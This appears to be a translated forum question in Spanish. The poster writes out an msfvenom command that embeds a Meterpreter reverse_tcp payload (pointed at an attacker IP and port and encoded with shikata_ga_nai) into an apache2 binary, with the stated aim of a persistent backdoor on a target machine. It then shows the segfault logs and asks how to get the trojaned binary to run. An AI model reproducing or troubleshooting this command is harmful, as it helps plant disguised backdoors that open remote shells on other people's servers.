He estado tratando de usar msfvenom con el linux/x86/meterpreter/reverse_tcp payload y un binario apache2. Mi intención es crear una versión contaminada de apache2 para establecer una puerta trasera persistente en la máquina de destino. A continuación se muestra el comando general que he estado intentando
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.181.218 LPORT=4444 -f elf -e x86/shikata_ga_nai -x ./apache2 -o ./apache2_hacked
Luego copio el binario apache2_hacked a la ubicación correcta e intento iniciarlo con service apache2 start . Esto se traduce en una falla seg.
root@kali:~# service apache2 start
Job for apache2.service failed. See 'systemctl status apache2.service' and 'journalctl -xn' for details.
root@kali:~# systemctl status apache2.service
● apache2.service - LSB: Apache2 web server
Loaded: loaded (/etc/init.d/apache2)
Active: failed (Result: exit-code) since Fri 2015-09-18 15:49:24 EDT; 3min 37s ago
Process: 3446 ExecStart=/etc/init.d/apache2 start (code=exited, status=1/FAILURE)
Sep 18 15:49:24 kali apache2[3446]: Starting web server: apache2 failed!
Sep 18 15:49:24 kali apache2[3446]: The apache2 configtest failed. ... (warning).
Sep 18 15:49:24 kali apache2[3446]: Output of config test was:
Sep 18 15:49:24 kali apache2[3446]: Segmentation fault
Sep 18 15:49:24 kali apache2[3446]: Action 'configtest' failed.
Sep 18 15:49:24 kali apache2[3446]: The Apache error log may have more information.
Sep 18 15:49:24 kali systemd[1]: apache2.service: control process exited, code=exited status=1
Sep 18 15:49:24 kali systemd[1]: Failed to start LSB: Apache2 web server.
Sep 18 15:49:24 kali systemd[1]: Unit apache2.service entered failed state.
¿Estoy usando la herramienta correctamente? ¿Hay alguna restricción en las plantillas que deba tener en cuenta? ¿Hay algo especial sobre el binario apache2 que evita los intentos de inyección como este?